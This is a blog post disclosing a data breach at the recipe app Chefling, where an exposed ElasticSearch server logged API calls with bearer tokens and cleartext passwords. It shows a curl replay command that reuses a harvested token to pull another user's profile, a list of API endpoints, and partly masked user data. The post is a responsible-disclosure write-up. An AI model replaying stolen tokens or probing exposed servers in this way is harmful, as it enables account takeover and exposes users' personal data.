Chefling: Exposed ElasticSearch server leads to data breach, including cleartext passwords.

Darryl Burke |

An unsecured ElasticSearch server in use by Chefling (A mobile AI applicaiton recipie company) containing detailed mobile client API calls, leads to the exposure of several thousand Chefling users emails, cleartext passwords, and login tokens  

Intro

*Note on Responsible Disclosure: Chefling has been notified of the ElasticSearch Server, and has secured it prior publication of this blog. A 30 day publication notice to Chefling has been given.

Why won't people learn.

  • If you use ElasticSearch you must secure your server.
  • If you log api calls you must redact any passwords sent.

While working on my ElasticServer (ES) data profiler, I came across a server which was using ES to report on it's API usage. I've seen this a few times, with either simple logging, or API calls which have their data sanitised.  Not so with Chefling.

After a quick look at the data objects being indexed, it became immediately clear that this was going to lead down a rabbit hole of complete ownage. No doubt about it.

Sample API Request / Response

{
  "_type": "api_service_type",
  "_source": {
    "path": "api/v6/user/profile",
    
    "headers": "{\"authorization\":\"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImp0aSI6IjJkN2M5NjhkN2E4ODRhNWE0MmY1ZGZkMTQzODBjZmQzZDU1MTkxMGE2YTcyOWEyMmI4NDBmZWJkMzM2M2VjODBjMTRhODlkZTUyYTFjNzJjIn0...........KJibJPz4IwCFaTnZIZcnPal8TdcqAFmES9OvCO1uN3jw9SNs5Nqk7RA7EEB6iuttLBnsy_qr4uUXBITmtWprQN82vlolDDOx6SnAdo\",\"appversion\":\"0.0.1\",\"source\":\"chefling-transport\",\"user-age
nt\":\"python-requests\\/2.20.1\",\"accept\":\"*\\/*\",\"accept-encoding\":\"gzip, deflate\",\"connection\":\"keep-alive\",\"host\":\"chefling-api\",\"content-length\":\"\",\"content-type\":\"\"}",

    "request": "[]",

    "response": "{\"status\":0,\"data\":{\"profile\":{\"uid\":331014,\"name\":\"Guest\",\"userphoto\":\"\",\"introduction\":\"\",\"zipcode\":\"00000\",\"public_gid\":-1,\"self_gid\":331028,\"preferen
ce_status\":0,\"email\":\"f5e21319-3856-426c-93ed-3a5e7ee46a19@chefling.com\",\"facebookuid\":\"\",\"googleuid\":null,\"active\":1,\"receive_email\":1,\"notification\":1,\"enable_video_autoplay\":tru
e,\"managment_level\":0,\"linkedBosch\":false},\"members\":[{\"uid\":331014,\"userphoto\":\"\",\"name\":\"Guest\",\"introduction\":\"\"}],\"favourites\":{\"recipes\":[],\"id\":8}}}",
    "all_t": 400.46
  }
}

Why log head the header Authorisation token?, I can't tell you, but its an easy way to see if a reply attack is possible..  Lets try it out.

Replay Attack using Curl and Header tokens

curl -H "authorization: Bearer eyJ0eXAiOiJKV1QiLCJhb..........LCJpYXQiOjE1NTM3MzE2...
CGEjiWYhLBtqj1jLGcqnUwrvVDM1m_3FD--6JQnYzNTZ5WGwKtH35g3JGhGGF8hpBTumPHkbWJScvm0" \
-H "appversion: 0.0.1" \
-H "source: chefling-transport" \
-H "user-agent: python-requests/2.21.0" \
-H "accept: */*" \
-H "accept-encoding: gzip deflate" \
-H "connection: keep-alive" \
http://api.cheflingv1.com/api/v6/user/profile 
{"status":0,"data":{"profile":{"uid":441362,"name":"Jazzmine","userphoto":"https:\/\/s3.amazonaws.com\/chefling\/userprofile\/0_95176750-50ed-11e.....","introduction":"","zipcode":"000000","public_gid":-1,"self_gid":442027,"preference_status":0,"email":"jazzmineXXXXXXXXXX@gmail.com","facebookuid":"","googleuid":"","active":1,"receive_email":1,"notification":1,"enable_video_autoplay":true,"managment_level":0,"linkedBosch":false},"members":[{"uid":441362,"userphoto":"https:\/\/s3.amazonaws.com\/chefling\/userprofile\/0_9517......","name":"Jazzmine","introduction":""}],"favourites":{"recipes":[],"id":8}}}

Well that went exactly as expected..   With that out of the way, lets check to see what API endpoints exist in the logs that can be abused.

API Endpoints

api/v5/application/status
api/v5/cookbook/discover
api/v5/cookbook/discover/more
api/v5/cookbook/discover/search
api/v5/cookbook/favorite
api/v5/cookbook/favorite/more
api/v5/cookbook/pantryingredients
api/v5/cookbook/readytocook
api/v5/cookbook/readytocook/expired
api/v5/food/createfoodtype
api/v5/food/deletefoodtypes
api/v5/food/getfood
api/v5/food/getfoodtype
api/v5/food/updatefoodtypes
api/v5/pantry/add
api/v5/pantry/delete
api/v5/pantry/get
api/v5/pantry/tolist
api/v5/pantry/update
api/v5/recipe/detail
api/v5/recipe/dislike
api/v5/recipe/getingredients
api/v5/recipe/reversefav
api/v5/recipe/selectedtolist
api/v5/shoppingcart/add
api/v5/shoppingcart/checkout
api/v5/shoppingcart/clear
api/v5/shoppingcart/delete
api/v5/shoppingcart/get
api/v5/shoppingcart/update
api/v5/shoppinglist/add
api/v5/shoppinglist/delete
api/v5/shoppinglist/get
api/v5/shoppinglist/topantry
api/v5/shoppinglist/update
api/v5/user/apply
api/v5/user/approve
api/v5/user/decline
api/v5/user/fblogin
api/v5/user/googleLogin
api/v5/user/guesttomember
api/v5/user/guesttomember/byfacebook
api/v5/user/guesttomember/bygoogle
api/v5/user/invite
api/v5/user/isexisted
api/v5/user/login
api/v5/user/preference/fetch
api/v5/user/preference/update
api/v5/user/profile/v2
api/v5/user/quitgroup
api/v5/user/register
api/v5/user/resetpassword
api/v5/user/search
api/v5/user/update
api/v6/cookbook/detailpage/v2
api/v6/cookbook/discover/search
api/v6/cookbook/getingredients
api/v6/mealplan/delete
api/v6/mealplan/get
api/v6/mealplan/set
api/v6/pantry/get
api/v6/recipe/search
api/v6/refer/me
api/v6/shoppinglist/add
api/v6/user/code
api/v6/user/profile
api/v6/user/referredby

The reset endpoint was a dead end, but the login & register endpoints was the where I hit the motherload.

{
    "path": "api/v5/user/login",
    "headers": (Similiar as previous)
	"request": "	{\"grant_type\":\"password\",\"type\":1,\"password\":\"CLEARTEXT\",\"username\":\"ericXXXXXXX@gmail.com\",\"client_id\":\"1\",\"client_secret\":\"XXXXXXXXXXX\"}",
    "response": "{\"code\":200}",
    "all_t": 437.36
  }
}

Got to love those clear text passwords that get sent from mobile clients.

Summary of issues found with Chefling

  1. Usecured ElasticSearch Server.
  2. Use of clear text passwords when logging API calls.
  3. unprotected Kibana server running on port 80.
  4. Authorization tokens in the API logging.

If your a Chefling user, Change your password now, and any other account tied to your email that may have used the same password.

You may also want to revoke and renew your facebook/google login for Chefling, as previous Chefling authorization tokens can be reused to gain access to your account.

Show Comments